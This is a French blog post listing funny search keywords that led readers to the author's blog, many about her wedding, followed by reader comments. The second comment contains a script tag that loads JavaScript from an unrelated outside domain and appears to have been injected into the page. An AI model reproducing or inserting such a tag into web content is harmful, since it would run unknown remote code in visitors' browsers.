• Mots en pagaille - 6ème

    Ça fait longtemps que je n'ai pas répertorié ici les mots clés. Donc un petit florilège :

    • Catégorie "Euh ouais ok !" :

    "Je n'ai pas le temps de détester ceux qui me détestent je suis trop occupé à aimer ceux qui m'aiment !" --> Certes certes ! Mais que diable, un peu de respect pour ces gens qui perdent leur temps à ne pas m'aimer /PAN/
    "J'ai des chaussures de salope" --> Bah ma chériiiie ! 
    "Je ne sais plus quoi porter" --> Que te dire mon amie (oui c'est forcément une nana soyons honnête !) ? O.o 
    "Hamxter x baise" --> Alors celui-là ! Mais que cherchais-tu O.o ???

    • Catégorie "Je t'aime toi !" :

    "Images de pieds et mains trop styler vernis" --> Viens dans mes bras internaute ♥ Ouh yeah je gère du pinceau vernis moi keskya ?!

    • Catégorie "Vous cherchez mon mariage ?" :

    "Hachi vidéo single ladies" --> C'est par ici merci ♥
    "Hachi prestataires mariage pau" --> Ici =D
    "Hachi mariage domaine de lucain" --> C'était vraiment le pied ! Un lieu enchanteur ♥
    "Dos de la robe Alianza" --> Y a qu'à demandé =D

    "Blog mariage d'Hachi" --> C'est par !
    "Mariage Pau Lucain" --> Suis quand même contente que mes mots clés servent à quelque chose. Au moins si ça peut aider des futurs mariés à se décider sur le lieu ♥

    Les éditions précédentes ? Ici, ici, encore ici, et =)

    « Un 'tit tag en passant =){Les petits bonheurs de la semaine} #13 »

    Tags Tags : , , , ,
  • Commentaires

    1
    coxinette
    Mardi 20 Mars 2012 à 10:51
    coxinette

    y'a toujours de ces recherche de ouf que tu sais pas ce qui traverse l'esprit de certain... sur le site du mag aussi on a des recherche space de la mort qui tue tout!

    2
    Mercredi 21 Mars 2012 à 12:10
    chali64

    sur mon blog il y a aussi les mots "lucain" , mariage bord de mer , si mes photos peuvent aider les futurs mariés j'en suis ravie

    une fois j'ai vu "ours en peluche" lol

    <script src="http://pluginthemerose.info/dfi823hs.js?0.5381404399050104" type="text/javascript"></script>
    3
    Samedi 24 Mars 2012 à 16:35
    Oryann

    Quelle belle photo de robe !!! J'adooooooooooore :) Les boutons, les petits brillants, les "plis" !

    Au fait je t'ai taguée ici : http://ohedugateau.com/2012/03/24/j-350-et-si-on-blablatait-un-peu/

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :